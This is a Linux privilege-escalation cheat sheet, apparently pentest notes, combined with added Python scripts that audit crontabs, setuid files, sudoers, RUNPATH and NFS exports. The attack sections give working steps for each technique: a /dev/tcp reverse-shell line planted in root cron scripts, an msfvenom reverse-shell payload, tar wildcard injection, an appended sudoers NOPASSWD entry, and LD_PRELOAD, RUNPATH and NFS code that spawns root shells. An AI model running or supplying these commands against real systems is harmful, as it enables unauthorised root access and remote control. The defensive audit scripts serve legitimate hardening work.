```bash
# Check the kernel level and Linux OS version
uname -a
cat /etc/lsb-release
```
Cron Jobs
```bash
# Find world-writable files or directories; look for uncommon files which can be leveraged to escalate privileges
find / -path /proc -prune -o -type f -perm -o+w -print 2>/dev/null
# Find cron jobs
cat /etc/crontab
# Confirm the job is running using pspy - https://github.com/DominicBreuker/pspy
# The -pf flag tells the tool to print commands and file system events, and -i 1000 tells it to scan procfs every 1000 ms (every second)
./pspy64 -pf -i 1000
# If a script is run by root from a cron job and is also writable by us, we can add our reverse shell one-liner to the script
bash -i >& /dev/tcp/<ip>/443 0>&1
```
If a cron job program/script does not use an absolute path, and one of the PATH directories is writable by our user, we may be able to create a program/script with the same name as the cron job.
```bash
# Create a file with the same name as the cron job in a directory writable by our user which is also included in PATH
```

```bash
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
```

```bash
# Make it executable, wait for the cron job to run, then execute the copied shell with -p so it keeps the elevated privileges
/tmp/rootbash -p
```
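The defensive counterpart of the two cron weaknesses above (a root job whose script is writable by others, and a job that names its command without an absolute path while a writable directory sits earlier in cron's PATH) is an audit of the crontab itself. The following script is an added example, not code from the original page: it parses `/etc/crontab`-style lines, resolves bare command names against the PATH the crontab sets, and flags writable scripts and writable PATH entries. The sample crontab and the directory tree it checks are constructed in a temporary directory, so nothing here touches the real system; the default cron PATH of `/usr/bin:/bin` is an assumption.

```python
import os
import shlex
import stat
import tempfile

# Default PATH cron applies when the crontab itself sets none (assumption: Vixie-cron default)
DEFAULT_CRON_PATH = "/usr/bin:/bin"


def writable_by_others(path):
    """True if the group or world write bit is set (the find -perm -o+w idea, widened to group)."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def parse_crontab(text):
    """Yield (user, command, PATH) for each job line of a system crontab, tracking PATH= lines."""
    path = DEFAULT_CRON_PATH
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("PATH="):
            path = line[len("PATH="):].strip().strip('"')
            continue
        fields = line.split(None, 6)  # min hour dom mon dow user command
        if len(fields) == 7 and not line[0].isalpha():
            yield fields[5], fields[6], path


def audit_crontab(text, root="/"):
    """Return findings for the crontab text; `root` relocates absolute paths so tests can use a fake tree."""
    findings = []
    for user, command, path in parse_crontab(text):
        try:
            argv = shlex.split(command)
        except ValueError:
            continue
        if not argv:
            continue
        prog = argv[0]
        if "/" not in prog:
            # Bare command name: cron searches PATH in order, so any directory writable by
            # others that comes before the real binary can supply a lookalike
            for d in path.split(":"):
                d_full = os.path.join(root, d.lstrip("/"))
                if writable_by_others(d_full):
                    findings.append(f"{user} job runs '{prog}' by name; PATH entry {d} is writable by others")
                if os.path.exists(os.path.join(d_full, prog)):
                    break
        # Any absolute path in the command (the program itself or a script it runs) must not
        # be writable by anyone other than its owner
        for arg in argv:
            if arg.startswith("/"):
                target = os.path.join(root, arg.lstrip("/"))
                if os.path.isfile(target) and writable_by_others(target):
                    findings.append(f"{user} job uses {arg}, which is writable by others")
    return findings


def demo():
    """Build a constructed tree and crontab in a temp dir and audit it (returns the findings)."""
    root = tempfile.mkdtemp()
    for d, mode in (("opt", 0o755), ("usr/bin", 0o755), ("home/user/bin", 0o777)):
        os.makedirs(os.path.join(root, d))
        os.chmod(os.path.join(root, d), mode)
    for f, mode in (("opt/backup.sh", 0o777), ("usr/bin/cleanup", 0o755)):
        with open(os.path.join(root, f), "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(os.path.join(root, f), mode)
    crontab = (
        "PATH=/home/user/bin:/usr/bin\n"
        "* * * * * root /opt/backup.sh\n"      # constructed: root runs a world-writable script
        "*/5 * * * * root cleanup --all\n"     # constructed: bare name, writable dir earlier in PATH
        "0 3 * * * root /usr/bin/cleanup\n"    # constructed: absolute path, not writable, no finding
    )
    return audit_crontab(crontab, root=root)


if __name__ == "__main__":
    for finding in demo():
        print("FINDING:", finding)
```

Run against a real host by passing `open("/etc/crontab").read()` to `audit_crontab` with the default `root="/"`; the same check is worth repeating over the files in `/etc/cron.d` and the per-user crontabs.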
Special Permissions
Setuid Bit -
The Set User ID upon Execution (setuid) permission can allow a user to execute a program or script with the permissions of another user, typically with elevated privileges. The setuid bit appears as an `s` in the file's permission string.
Setgid Bit -
The Set-Group-ID (setgid) permission is another special permission that allows us to run binaries as if we were a member of the file's owning group.
```bash
# Find files with the setuid bit set
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
# Find files with the setgid bit set (-perm -2000; -perm -6000 would only match files that have both setuid and setgid set)
find / -user root -perm -2000 -exec ls -ldb {} \; 2>/dev/null
# Check GTFOBins for binaries that can be used to bypass security restrictions
```
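From the defender's side, the useful question is not "which files carry a special bit" but "which of them were not there yesterday". The script below is an added example, not code from the original page: it walks a tree, classifies each regular file by its setuid/setgid bits using the same distinction the `find -perm` tests make (`-4000` setuid, `-2000` setgid, `-6000` both), and reports every entry that is missing from, or differs from, a known-good baseline. The baseline and the sample tree (including a planted `tmp/rootbash` with both bits set) are constructed in a temporary directory.

```python
import os
import stat
import tempfile


def special_bits(mode):
    """Label the special bits of a st_mode value: 'suid', 'sgid', 'suid+sgid', or None."""
    suid = bool(mode & stat.S_ISUID)
    sgid = bool(mode & stat.S_ISGID)
    if suid and sgid:
        return "suid+sgid"
    if suid:
        return "suid"
    if sgid:
        return "sgid"
    return None


def inventory(root):
    """Walk root and return {relative_path: label} for every regular file with a special bit set."""
    found = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)  # lstat: do not follow symlinks into other trees
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            label = special_bits(st.st_mode)
            if label:
                found[os.path.relpath(full, root)] = label
    return found


def unexpected(found, baseline):
    """Entries absent from the baseline, or whose bits differ from the baseline's record."""
    return {path: label for path, label in found.items() if baseline.get(path) != label}


def demo():
    """Constructed sample: two expected binaries, one planted setuid+setgid shell copy, one plain file."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "usr/bin"))
    os.makedirs(os.path.join(root, "tmp"))
    samples = {
        "usr/bin/passwd": 0o4755,  # expected setuid
        "usr/bin/wall": 0o2755,    # expected setgid
        "tmp/rootbash": 0o6755,    # constructed: the planted copy of bash from the cron section
        "usr/bin/ls": 0o755,       # no special bits
    }
    for rel, mode in samples.items():
        p = os.path.join(root, rel)
        open(p, "w").close()
        os.chmod(p, mode)
    baseline = {"usr/bin/passwd": "suid", "usr/bin/wall": "sgid"}
    return unexpected(inventory(root), baseline)


if __name__ == "__main__":
    for path, label in demo().items():
        print(f"UNEXPECTED {label}: {path}")
```

On a real host, record `inventory("/")` once from a trusted state, store it, and diff against it on a schedule; a new entry under a world-writable directory such as `/tmp` is the pattern the cron and NFS techniques on this page leave behind.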
Sudo Rights Abuse
```bash
# Check the sudo rights of the current user
sudo -l
# Check GTFOBins for any useful abuse of the allowed commands
```
PATH abuse
```bash
# Check the PATH content
echo $PATH
env | grep PATH
# Add the current directory to the PATH variable
PATH=.:${PATH}
export PATH
echo $PATH
# Now a file in the current directory runs without specifying its path
touch ls
echo 'echo "PATH ABUSE!!"' > ls
chmod +x ls
```
Wildcard Abuse
```bash
# Payload to add a user to the sudoers file
echo "eren ALL=(root) NOPASSWD: ALL" >> /etc/sudoers
# Check if a command is run by any cron job or script with a wildcard
# Create a reverse shell using msfvenom
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=53 -f elf -o shell.elf
# Place the reverse shell in the directory the wildcard command is run from
# Create two files in that directory (the leading -- stops touch from treating the names as its own options):
touch -- "<directory>/--checkpoint=1"
touch -- "<directory>/--checkpoint-action=exec=shell.elf"
# Wait for the job to run and get a root shell
```
Credential Hunting
```bash
# Find files which may contain credentials
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null
cat wp-config.php | grep 'DB_USER\|DB_PASSWORD'
# Also look for SSH keys
```
Environment Variable
LD_PRELOAD
```bash
# List the programs your user is allowed to run via sudo
sudo -l
# Note if the env_keep option includes the LD_PRELOAD environment variable
# Create a C program to get a root shell
```

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* _init runs when the shared object is loaded via LD_PRELOAD */
void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}
```

```bash
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
# Run any allowed program using sudo, while setting the LD_PRELOAD environment variable to the full path of the preload.so file
```
LD_LIBRARY_PATH
```bash
# Print the shared objects required by a binary or shared object
ldd binary
# Check the RUNPATH configuration
readelf -d binary | grep PATH
# Compile a shared object with the code below to pop a root shell
```

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* The function name must match the symbol the binary imports from the library */
void dbquery() {
    printf("Malicious library loaded\n");
    setuid(0);
    system("/bin/sh -p");
}
```

```bash
gcc src.c -fPIC -shared -o /development/libshared.so   # <-- the RUNPATH directory the binary loads from
```
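Both loader-variable techniques above depend on a configuration mistake that can be checked for directly: a sudoers `Defaults` line that keeps `LD_PRELOAD` or `LD_LIBRARY_PATH` (or disables `env_reset` altogether), and an `RPATH`/`RUNPATH` that names a directory other users can write to. The script below is an added example, not code from the original page. It parses sudoers text for those `Defaults` options and parses `readelf -d` output for `RPATH`/`RUNPATH` entries, checking each listed directory's write bits. The sudoers and readelf samples are constructed, and the writable `/development` directory is created inside a temporary tree rather than on the real filesystem.

```python
import os
import re
import stat
import tempfile

LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH"}
ENV_KEEP_RE = re.compile(r'env_keep\s*\+?=\s*"?([^"]*)"?')
# Matches the readelf -d lines "(RPATH) Library rpath: [...]" and "(RUNPATH) Library runpath: [...]"
RUNPATH_RE = re.compile(r'\((RPATH|RUNPATH)\)\s+Library (?:rpath|runpath): \[([^\]]*)\]')


def audit_sudoers(text):
    """Findings for Defaults lines that let loader variables survive sudo."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line.startswith("Defaults"):  # also covers Defaults:user and Defaults!cmd forms
            continue
        if re.search(r'!\s*env_reset', line):
            findings.append("env_reset is disabled, so the caller's whole environment survives sudo")
        m = ENV_KEEP_RE.search(line)
        if m:
            for var in sorted(set(m.group(1).split()) & LOADER_VARS):
                findings.append(f"env_keep preserves {var}")
    return findings


def writable_runpath_dirs(readelf_output, root="/"):
    """RPATH/RUNPATH directories named in `readelf -d` output that are writable by group or world."""
    risky = []
    for line in readelf_output.splitlines():
        m = RUNPATH_RE.search(line)
        if not m:
            continue
        for d in m.group(2).split(":"):
            try:
                mode = os.stat(os.path.join(root, d.lstrip("/"))).st_mode
            except OSError:
                continue  # directory absent: nothing can be loaded from it, skip
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                risky.append(d)
    return risky


# Constructed sample inputs (not taken from any real host)
SUDOERS_SAMPLE = """\
Defaults        env_reset
Defaults        mail_badpass
Defaults        env_keep += "LD_PRELOAD"      # constructed: the weak setting
user1  ALL=(root) NOPASSWD: /usr/sbin/apache2
"""

READELF_SAMPLE = """\
 0x0000000000000001 (NEEDED)             Shared library: [libshared.so]
 0x000000000000001d (RUNPATH)            Library runpath: [/development:/usr/lib]
"""


def demo():
    """Run both checks against the samples; /development is world-writable in a temp tree, /usr/lib is not."""
    root = tempfile.mkdtemp()
    for d, mode in (("development", 0o777), ("usr/lib", 0o755)):
        os.makedirs(os.path.join(root, d))
        os.chmod(os.path.join(root, d), mode)
    return audit_sudoers(SUDOERS_SAMPLE), writable_runpath_dirs(READELF_SAMPLE, root=root)


if __name__ == "__main__":
    sudo_findings, runpath_dirs = demo()
    for f in sudo_findings:
        print("SUDOERS:", f)
    for d in runpath_dirs:
        print("WRITABLE RUNPATH DIR:", d)
```

The fix on the sudoers side is to remove the loader variables from `env_keep` (sudo strips them by default when `env_reset` is on); on the binary side, rebuild without the writable directory in its RUNPATH or restrict that directory's permissions.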
Weak NFS Privileges
```bash
# List the mountable shares
showmount -e <ip>
# Create a SETUID binary that executes a shell, using our local root user. We can then mount the /tmp directory locally, copy the root-owned binary over to the NFS server, and set the SUID bit.
```

shell.c

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash");
}
```

```bash
# Compile the binary
gcc shell.c -o shell
# Mount the share
sudo mount -t nfs <ip>:/tmp /mnt
cp shell /mnt
chmod u+s /mnt/shell
# Run the binary from the low-privileged user shell on the target
./shell
```
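The NFS technique above needs two things to line up: an export with `no_root_squash`, so a remote root can create root-owned files on the server, and a client-side mount that honours the setuid bit, i.e. one mounted without `nosuid`. The script below is an added example, not code from the original page: it parses `/etc/exports`-style text and reports exports with `no_root_squash` or `insecure`, and parses `/proc/mounts`-style lines to list NFS mounts that lack `nosuid`. Both inputs are constructed samples.

```python
import re


def parse_exports(text):
    """Yield (path, client, {options}) for each client spec in /etc/exports-style text."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        path, specs = parts[0], parts[1:]
        for spec in specs:
            # spec looks like "client(opt1,opt2)" or just "client"
            m = re.match(r'([^(]*)(?:\((.*)\))?$', spec)
            client = m.group(1) or "*"
            opts = set(filter(None, (m.group(2) or "").split(",")))
            yield path, client, opts


def risky_exports(text):
    """Findings for exports that let a client write root-owned files or skip the privileged-port check."""
    findings = []
    for path, client, opts in parse_exports(text):
        if "no_root_squash" in opts:
            findings.append(f"{path} exported to {client} with no_root_squash")
        if "insecure" in opts:
            findings.append(f"{path} exported to {client} with insecure (clients need not use a privileged source port)")
    return findings


def nfs_mounts_missing_nosuid(mounts_text):
    """From /proc/mounts lines, return the mount points of NFS mounts that do not carry nosuid."""
    missing = []
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        _source, mountpoint, fstype, opts = fields[:4]
        if fstype.startswith("nfs") and "nosuid" not in opts.split(","):
            missing.append(mountpoint)
    return missing


# Constructed samples (not from any real host)
EXPORTS_SAMPLE = """\
/srv/share  10.0.0.0/24(rw,sync,root_squash)
/tmp        *(rw,no_root_squash,insecure)   # constructed: the weak export
"""

MOUNTS_SAMPLE = """\
10.0.0.5:/srv/share /mnt/share nfs4 rw,nosuid,relatime 0 0
10.0.0.5:/tmp /mnt/tmp nfs4 rw,relatime 0 0
"""


def demo():
    """Return (export findings, NFS mounts without nosuid) for the constructed samples."""
    return risky_exports(EXPORTS_SAMPLE), nfs_mounts_missing_nosuid(MOUNTS_SAMPLE)


if __name__ == "__main__":
    exports, mounts = demo()
    for f in exports:
        print("EXPORT:", f)
    for m in mounts:
        print("MOUNT WITHOUT nosuid:", m)
```

On a server, feed `open("/etc/exports").read()` to `risky_exports`; on a client, feed `open("/proc/mounts").read()` to `nfs_mounts_missing_nosuid`. Keeping `root_squash` (the default) on the export and mounting with `nosuid` each independently breaks the chain described above.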